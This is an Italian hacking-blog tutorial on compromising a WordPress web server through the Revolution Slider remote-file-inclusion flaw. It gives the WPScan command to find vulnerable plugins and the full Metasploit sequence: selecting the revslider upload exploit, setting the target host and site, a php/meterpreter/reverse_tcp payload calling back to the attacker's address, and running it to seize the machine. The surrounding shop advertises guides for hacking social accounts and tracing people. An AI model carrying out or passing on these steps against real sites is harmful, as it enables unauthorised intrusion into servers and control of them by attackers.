HackerSecret.it - Il Sito Italiano Più Autorevole sul Mondo dell'Hacking, del Penetration Testing e della CyberSecurity

  • Home
  • Scarica l’App gratuita
  • Visita il Nostro Shop
  • Contattaci per info
VISITA IL NOSTRO SHOP ! CLICCA QUI !

Bucare un web server con Metasploit Framework

da Lo Staff di HackerSecret.it / domenica, 09 Giugno 2019 / Pubblicato il Hacking
Share
Tweet
Pin

In questo capitolo della guida su Metasploit Framework, sfruttiamo una vulnerabilità di Revolution Slider, un noto plugin per WordPress, per effettuare l’upload di un payload che aprirà una sessione di Meterpreter sul server che ospita il sito, garantendo all’attaccante il pieno controllo sulla macchina bersaglio.

Revolution Slider è uno dei plugin per creare slider di immagini su WordPress più comunemente usati e, nelle versioni precedenti alla 3.0.96, presenta una falla chiamata RFI (Remote File Inclusion) che permette a chiunque, anche agli utenti non registrati, l’inclusione di file da remoto. Sebbene nelle versioni più recenti, la falla sia stata riparata, ancora molti siti presentano versioni non aggiornate del plugin, inoltre è un’ottima occasione per dimostrare come sfruttare questo tipo di vulnerabilità con Metasploit.

Il sito vulnerabile

Prima di ogni cosa, dobbiamo accertarci che il sito che intendiamo attaccare presenti la vulnerabilità descritta sopra. Per farlo, utilizziamo WPScan, un software incluso in Kali Linux, descritto in uno degli articoli precedenti.

Avviamo WPScan per analizzare il sito in questione elencando i plugin vulnerabili con il seguente comando

wpscan -u [url_sito] -e vp

Dall’output di questo comando, possiamo chiaramente notare che RevSlider è presente e benché non riusciamo a capire quale versione sia installata, vale la pena tentare l’attacco.

Exploit web server - WPScan

Sfruttare RFI su WordPress e RevSlider con Metasploit

Partiamo avviando Metasploit in modalità MSFconsole con i soliti comandi

service postgresql start msfconsole

Avviato Metasploit, cerchiamo l’exploit che ci interessa e iniziamo ad utilizzarlo, digitando

search revslider use exploit/unix/webapp/wp_revslider_upload_execute

Exploit web server - Selezionare exploit

Vediamo le opzioni di configurazione dell’exploit e tutti i payload compatibili con esso

show options show payloads

Per questo tutorial ho scelto di utilizzare il payload php/meterpreter/reverse_tcp. Configuriamo l’exploit per l’attacco

set RHOST [indirizzo_ip_server_bersaglio] set VHOST [url_sito_bersaglio] set PAYLOAD php/meterpreter/reverse_tcp set LHOST [indirizzo_ip_attacker]

Exploit web server - Configurare exploit

Lanciamo l’attacco con il comando run o exploit, dopo pochi secondi si aprirà una sessione di Meterpreter sul server che ospita il sito.

Exploit web server - Lanciare attacco

 

Baty’s Base

Share
Tweet
Pin
Taggato in: Bucare, Framework, Metasploit, Server

Clicca subito qui per visitare il nostro Shop!

Clicca subito qui per visitare il nostro Shop!

Altri 2300 utenti come te lo hanno già fatto quest'anno!

Scegli qui il prodotto che ti serve!

  • HACKER LIBRARY LA PIU' GRANDE RACCOLTA DI LIBRI E MANUALI SULL'HACKING + 100 !!! 99,99€ 49,99€
  • HACKER PACK PER IL TUO SMARTPHONE E IL TUO TABLET CON ROOT GUIDA E + 100 PROGRAMMI !!! 99,99€ 49,99€
  • HACKER PACK X IL TUO COMPUTER E IL TUO NOTEBOOK + 1000 PROGRAMMI 5GB DI MATERIALE !!! 99,99€ 49,99€
  • SOCIAL HACK LA GUIDA + COMPLETA PER HACKERARE TUTTI I SOCIAL ACCOUNT !!! 99,99€ 49,99€
  • IL PRIMO VERO SMARTPHONE ANDROID DA HACKER SENZA ROOT UNICO AL MONDO CON TUTTE LE APP !!! 599,99€ 249,99€
  • IL PRIMO VERO SMARTPHONE ANDROID DA HACKER CON ROOT UNICO AL MONDO CON TUTTE LE APP !!! 699,99€ 299,99€

Dicono di Noi

Francesca M. – Sistemista

Share
Tweet
Pin
 
Samuel D. – Hacker Etico

Share
Tweet
Pin
 
Carola M. – Influencer

Share
Tweet
Pin
 
Renato P. – Investigatore Privato

Share
Tweet
Pin
 
Rosaria S. – Casalinga

Share
Tweet
Pin
 
Paolo V. – Consulente Informatico

Share
Tweet
Pin
 
Matteo C. – Imprenditore

Share
Tweet
Pin
 
Alice B. – Studentessa di Informatica

Share
Tweet
Pin
 
Goffredo B. – Analista IT

Share
Tweet
Pin
 
Roberto C. – Programmatore

Share
Tweet
Pin
 

SCARICATA 1316 VOLTE!

SCARICATA 1316 VOLTE!

Scarica subito Hacker Secret la nostra app Android gratuita.

Serve aiuto? Contattaci subito!

Contact Us
Scrivi il tuo indirizzo email qui
Scrivi qui come possiamo aiutarti - ti supportiamo immediatamente per ogni tua esigenza!

## Stai cercando prodotti per l’hacking, la sicurezza informatica e il penetration testing? Hai bisogno di bonificare il tuo smartphone, il tuo pc o il tuo sito da virus e malware? Devi rintracciare una persona o recuperare delle informazioni urgenti? Devi riprendere possesso di un account, una mail o di una password che ti hanno sottratto? Vuoi acquistare device già configurati per sperimentare tutte le tecniche di hacking in modo facile e veloce? Hai esigenze particolari in ambito software o hardware? ##

Contattaci subito…altri 2300 utenti come te lo hanno già fatto quest’anno!

Clicca subito qui!

Cerca nel Sito

Gli ultimi articoli

  • Protostar – Heap Buffer Overflow – Heap 1

  • Protostar – Heap Buffer Overflow – Heap 2

  • RoyalTS SSH Tunnel – Authentication Bypass [CVE-2020-13872]

  • Come Funziona Metamask: Aggiungere Token, Regolare Gas, Cambiare Network

  • Cosa Vuol Dire Cripto Deflazionistiche? Indexed Deflationary Token

Tutte le tecniche, i prodotti e i servizi descritti o contenuti in questo sito si intendono per uso esclusivo di studio e di aggiornamento professionale e per testare la sicurezza della propria rete informatica in accordo alle vigenti normative sull'accesso a sistemi informativi e telematici (cfr. art. 615 ter c.p. e successive modifiche).

TORNA SU